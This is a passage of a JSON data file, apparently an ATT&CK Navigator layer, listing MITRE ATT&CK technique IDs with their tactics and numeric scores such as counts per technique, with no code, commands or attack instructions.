\"metadata\": [],\n      
\"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1037.005\",\n      \"tactic\": \"persistence\",\n      \"score\": 1,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1037.005\",\n      \"tactic\": \"privilege-escalation\",\n      \"score\": 1,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1546.014\",\n      \"tactic\": \"privilege-escalation\",\n      \"score\": 1,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1546.014\",\n      \"tactic\": \"persistence\",\n      \"score\": 1,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1078.003\",\n      \"tactic\": \"defense-evasion\",\n      \"score\": 5,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1078.003\",\n      \"tactic\": \"persistence\",\n      \"score\": 5,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1078.003\",\n      \"tactic\": \"privilege-escalation\",\n      \"score\": 5,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      
\"techniqueID\": \"T1078.003\",\n      \"tactic\": \"initial-access\",\n      \"score\": 5,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1569.001\",\n      \"tactic\": \"execution\",\n      \"score\": 1,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1543.001\",\n      \"tactic\": \"persistence\",\n      \"score\": 2,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1543.001\",\n      \"tactic\": \"privilege-escalation\",\n      \"score\": 2,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1543.004\",\n      \"tactic\": \"persistence\",\n      \"score\": 3,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1543.004\",\n      \"tactic\": \"privilege-escalation\",\n      \"score\": 3,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1218\",\n      \"tactic\": \"defense-evasion\",\n      \"score\": 152,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1564.004\",\n      \"tactic\": \"defense-evasion\",\n      
\"score\": 23,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1189\",\n      \"tactic\": \"initial-access\",\n      \"score\": 3,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1564.002\",\n      \"tactic\": \"defense-evasion\",\n      \"score\": 4,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1555.001\",\n      \"tactic\": \"credential-access\",\n      \"score\": 1,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1497.001\",\n      \"tactic\": \"defense-evasion\",\n      \"score\": 3,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1497.001\",\n      \"tactic\": \"discovery\",\n      \"score\": 3,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1566.001\",\n      \"tactic\": \"initial-access\",\n      \"score\": 23,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1059.002\",\n      \"tactic\": \"execution\",\n      \"score\": 8,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n     
 \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1056.002\",\n      \"tactic\": \"collection\",\n      \"score\": 3,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1056.002\",\n      \"tactic\": \"credential-access\",\n      \"score\": 3,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1078.001\",\n      \"tactic\": \"defense-evasion\",\n      \"score\": 4,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1078.001\",\n      \"tactic\": \"persistence\",\n      \"score\": 4,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1078.001\",\n      \"tactic\": \"privilege-escalation\",\n      \"score\": 4,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1078.001\",\n      \"tactic\": \"initial-access\",\n      \"score\": 4,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1036.006\",\n      \"tactic\": \"defense-evasion\",\n      \"score\": 1,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    
},\n    {\n      \"techniqueID\": \"T1137.002\",\n      \"tactic\": \"persistence\",\n      \"score\": 2,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1204.002\",\n      \"tactic\": \"execution\",\n      \"score\": 36,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1553\",\n      \"tactic\": \"defense-evasion\",\n      \"score\": 4,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1059.007\",\n      \"tactic\": \"execution\",\n      \"score\": 22,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1071\",\n      \"tactic\": \"command-and-control\",\n      \"score\": 7,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1553.001\",\n      \"tactic\": \"defense-evasion\",\n      \"score\": 1,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1586.003\",\n      \"tactic\": \"resource-development\",\n      \"score\": 1,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1590\",\n      \"tactic\": \"reconnaissance\",\n      
\"score\": 2,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1197\",\n      \"tactic\": \"defense-evasion\",\n      \"score\": 16,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1197\",\n      \"tactic\": \"persistence\",\n      \"score\": 16,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1102.001\",\n      \"tactic\": \"command-and-control\",\n      \"score\": 4,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1102.003\",\n      \"tactic\": \"command-and-control\",\n      \"score\": 2,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1568\",\n      \"tactic\": \"command-and-control\",\n      \"score\": 1,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1595\",\n      \"tactic\": \"reconnaissance\",\n      \"score\": 3,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1567.002\",\n      \"tactic\": \"exfiltration\",\n      \"score\": 13,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": 
true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1056\",\n      \"tactic\": \"collection\",\n      \"score\": 2,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1056\",\n      \"tactic\": \"credential-access\",\n      \"score\": 2,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1221\",\n      \"tactic\": \"defense-evasion\",\n      \"score\": 2,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1499.004\",\n      \"tactic\": \"impact\",\n      \"score\": 3,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1210\",\n      \"tactic\": \"lateral-movement\",\n      \"score\": 15,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1127\",\n      \"tactic\": \"defense-evasion\",\n      \"score\": 20,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1055.001\",\n      \"tactic\": \"defense-evasion\",\n      \"score\": 8,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      
\"techniqueID\": \"T1055.001\",\n      \"tactic\": \"privilege-escalation\",\n      \"score\": 8,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1218.011\",\n      \"tactic\": \"defense-evasion\",\n      \"score\": 43,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1055\",\n      \"tactic\": \"defense-evasion\",\n      \"score\": 33,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1055\",\n      \"tactic\": \"privilege-escalation\",\n      \"score\": 33,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1055.003\",\n      \"tactic\": \"defense-evasion\",\n      \"score\": 2,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1055.003\",\n      \"tactic\": \"privilege-escalation\",\n      \"score\": 2,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1055.012\",\n      \"tactic\": \"defense-evasion\",\n      \"score\": 5,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1055.012\",\n      \"tactic\": 
\"privilege-escalation\",\n      \"score\": 5,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1059.005\",\n      \"tactic\": \"execution\",\n      \"score\": 26,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1218.005\",\n      \"tactic\": \"defense-evasion\",\n      \"score\": 8,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1555.005\",\n      \"tactic\": \"credential-access\",\n      \"score\": 1,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1195.002\",\n      \"tactic\": \"initial-access\",\n      \"score\": 3,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1482\",\n      \"tactic\": \"discovery\",\n      \"score\": 17,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1090.003\",\n      \"tactic\": \"command-and-control\",\n      \"score\": 3,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1559.001\",\n      \"tactic\": \"execution\",\n      \"score\": 4,\n      \"color\": \"\",\n      \"comment\": 
\"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1218.010\",\n      \"tactic\": \"defense-evasion\",\n      \"score\": 19,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1003.005\",\n      \"tactic\": \"credential-access\",\n      \"score\": 8,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1134.001\",\n      \"tactic\": \"defense-evasion\",\n      \"score\": 9,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1134.001\",\n      \"tactic\": \"privilege-escalation\",\n      \"score\": 9,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1546.003\",\n      \"tactic\": \"privilege-escalation\",\n      \"score\": 12,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1546.003\",\n      \"tactic\": \"persistence\",\n      \"score\": 12,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1550.003\",\n      \"tactic\": \"defense-evasion\",\n      \"score\": 4,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      
\"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1550.003\",\n      \"tactic\": \"lateral-movement\",\n      \"score\": 4,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1218.003\",\n      \"tactic\": \"defense-evasion\",\n      \"score\": 7,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1127.001\",\n      \"tactic\": \"defense-evasion\",\n      \"score\": 1,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1218.009\",\n      \"tactic\": \"defense-evasion\",\n      \"score\": 4,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1021.006\",\n      \"tactic\": \"lateral-movement\",\n      \"score\": 11,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1090.002\",\n      \"tactic\": \"command-and-control\",\n      \"score\": 2,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1562.002\",\n      \"tactic\": \"defense-evasion\",\n      \"score\": 26,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      
\"techniqueID\": \"T1055.011\",\n      \"tactic\": \"defense-evasion\",\n      \"score\": 1,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1055.011\",\n      \"tactic\": \"privilege-escalation\",\n      \"score\": 1,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1548.002\",\n      \"tactic\": \"privilege-escalation\",\n      \"score\": 56,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1548.002\",\n      \"tactic\": \"defense-evasion\",\n      \"score\": 56,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1543\",\n      \"tactic\": \"persistence\",\n      \"score\": 9,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1543\",\n      \"tactic\": \"privilege-escalation\",\n      \"score\": 9,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1599.001\",\n      \"tactic\": \"defense-evasion\",\n      \"score\": 1,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1218.014\",\n      \"tactic\": \"defense-evasion\",\n    
  \"score\": 2,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1220\",\n      \"tactic\": \"defense-evasion\",\n      \"score\": 5,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1574.007\",\n      \"tactic\": \"persistence\",\n      \"score\": 2,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1574.007\",\n      \"tactic\": \"privilege-escalation\",\n      \"score\": 2,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1574.007\",\n      \"tactic\": \"defense-evasion\",\n      \"score\": 2,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1027.002\",\n      \"tactic\": \"defense-evasion\",\n      \"score\": 1,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1202\",\n      \"tactic\": \"defense-evasion\",\n      \"score\": 39,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1129\",\n      \"tactic\": \"execution\",\n      \"score\": 2,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n     
 \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1518\",\n      \"tactic\": \"discovery\",\n      \"score\": 4,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1588.002\",\n      \"tactic\": \"resource-development\",\n      \"score\": 9,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1070.001\",\n      \"tactic\": \"defense-evasion\",\n      \"score\": 7,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1218.001\",\n      \"tactic\": \"defense-evasion\",\n      \"score\": 6,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1546.002\",\n      \"tactic\": \"privilege-escalation\",\n      \"score\": 4,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1546.002\",\n      \"tactic\": \"persistence\",\n      \"score\": 4,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1587.001\",\n      \"tactic\": \"resource-development\",\n      \"score\": 11,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n  
  },\n    {\n      \"techniqueID\": \"T1074.001\",\n      \"tactic\": \"collection\",\n      \"score\": 4,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1027.004\",\n      \"tactic\": \"defense-evasion\",\n      \"score\": 6,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1574.011\",\n      \"tactic\": \"persistence\",\n      \"score\": 11,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1574.011\",\n      \"tactic\": \"privilege-escalation\",\n      \"score\": 11,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1574.011\",\n      \"tactic\": \"defense-evasion\",\n      \"score\": 11,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1012\",\n      \"tactic\": \"discovery\",\n      \"score\": 14,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1574.008\",\n      \"tactic\": \"persistence\",\n      \"score\": 2,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1574.008\",\n      \"tactic\": 
